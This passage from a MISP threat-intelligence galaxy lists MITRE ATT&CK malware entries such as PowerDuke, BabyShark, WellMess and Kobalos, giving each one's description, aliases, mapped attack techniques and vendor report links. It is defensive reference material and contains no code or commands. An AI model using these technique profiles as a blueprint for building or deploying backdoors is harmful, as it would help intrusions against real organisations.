uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

Table 4866. Table References
Links
https://attack.mitre.org/software/S0391
https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

Allwinner - S0319

[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)

The tag is: misp-galaxy:mitre-malware="Allwinner - S0319"

Allwinner - S0319 is also known as:

Allwinner

View relationships graph

Allwinner - S0319 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 4867. Table References
Links
https://attack.mitre.org/software/S0319
https://thehackernews.com/2016/05/android-kernal-exploit.html

PowerDuke - S0139

[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)

The tag is: misp-galaxy:mitre-malware="PowerDuke - S0139"

PowerDuke - S0139 is also known as:

PowerDuke

View relationships graph

PowerDuke - S0139 has relationships with:

similar: misp-galaxy:malpedia="PowerDuke" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 4868. Table References
Links
https://attack.mitre.org/software/S0139
https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

BabyShark - S0414

[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)

The tag is: misp-galaxy:mitre-malware="BabyShark - S0414"

BabyShark - S0414 is also known as:

BabyShark

View relationships graph

BabyShark - S0414 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 4869. Table References
Links
https://attack.mitre.org/software/S0414
https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

ChChes - S0144

[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: misp-galaxy:mitre-malware="ChChes - S0144"

ChChes - S0144 is also known as:

ChChes
Scorpion
HAYMAKER

View relationships graph

ChChes - S0144 has relationships with:

similar: misp-galaxy:tool="HAYMAKER" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="ChChes" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4870. Table References
Links
https://attack.mitre.org/software/S0144
http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/
http://blog.jpcert.or.jp/2017/02/chches-malware—93d6.html
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
https://twitter.com/ItsReallyNick/status/850105140589633536

PowerShower - S0441

[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="PowerShower - S0441"

PowerShower - S0441 is also known as:

PowerShower

View relationships graph

PowerShower - S0441 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4871. Table References
Links
https://attack.mitre.org/software/S0441
https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/
https://securelist.com/recent-cloud-atlas-activity/92016/

BOOSTWRITE - S0415

[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)

The tag is: misp-galaxy:mitre-malware="BOOSTWRITE - S0415"

BOOSTWRITE - S0415 is also known as:

BOOSTWRITE

View relationships graph

BOOSTWRITE - S0415 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4872. Table References
Links
https://attack.mitre.org/software/S0415
https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

POWERSOURCE - S0145

[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)

The tag is: misp-galaxy:mitre-malware="POWERSOURCE - S0145"

POWERSOURCE - S0145 is also known as:

POWERSOURCE
DNSMessenger

View relationships graph

POWERSOURCE - S0145 has relationships with:

similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 4873. Table References
Links
https://attack.mitre.org/software/S0145
https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
http://blog.talosintelligence.com/2017/03/dnsmessenger.html

LoudMiner - S0451

[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)

The tag is: misp-galaxy:mitre-malware="LoudMiner - S0451"

LoudMiner - S0451 is also known as:

LoudMiner

View relationships graph

LoudMiner - S0451 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Resource Hijacking - T1496" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1543.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4874. Table References
Links
https://attack.mitre.org/software/S0451
https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/

WellMess - S0514

[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)

The tag is: misp-galaxy:mitre-malware="WellMess - S0514"

WellMess - S0514 is also known as:

WellMess

View relationships graph

WellMess - S0514 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 4875. Table References
Links
https://attack.mitre.org/software/S0514
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b
https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

TEXTMATE - S0146

[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)

The tag is: misp-galaxy:mitre-malware="TEXTMATE - S0146"

TEXTMATE - S0146 is also known as:

TEXTMATE
DNSMessenger

View relationships graph

TEXTMATE - S0146 has relationships with:

similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 4876. Table References
Links
https://attack.mitre.org/software/S0146
https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
http://blog.talosintelligence.com/2017/03/dnsmessenger.html

CostaBricks - S0614

[CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-malware="CostaBricks - S0614"

CostaBricks - S0614 is also known as:

CostaBricks

View relationships graph

CostaBricks - S0614 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4877. Table References
Links
https://attack.mitre.org/software/S0614
https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

SDBbot - S0461

[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)

The tag is: misp-galaxy:mitre-malware="SDBbot - S0461"

SDBbot - S0461 is also known as:

SDBbot

View relationships graph

SDBbot - S0461 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 4878. Table References
Links
https://attack.mitre.org/software/S0461
https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader
https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/

RDFSNIFFER - S0416

[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)

The tag is: misp-galaxy:mitre-malware="RDFSNIFFER - S0416"

RDFSNIFFER - S0416 is also known as:

RDFSNIFFER

View relationships graph

RDFSNIFFER - S0416 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"

Table 4879. Table References
Links
https://attack.mitre.org/software/S0416
https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

TDTESS - S0164

[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)

The tag is: misp-galaxy:mitre-malware="TDTESS - S0164"

TDTESS - S0164 is also known as:

TDTESS

View relationships graph

TDTESS - S0164 has relationships with:

similar: misp-galaxy:malpedia="TDTESS" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4880. Table References
Links
https://attack.mitre.org/software/S0164
http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf

Kobalos - S0641

[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)

The tag is: misp-galaxy:mitre-malware="Kobalos - S0641"

Kobalos - S0641 is also known as:

Kobalos

View relationships graph

Kobalos - S0641 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4881. Table References
Links
https://attack.mitre.org/software/S0641
https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/
https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf

GRIFFON - S0417

[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)

The tag is: misp-galaxy:mitre-malware="GRIFFON - S0417"

GRIFFON - S0417 is also known as:

GRIFFON

View relationships graph

GRIFFON - S0417 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
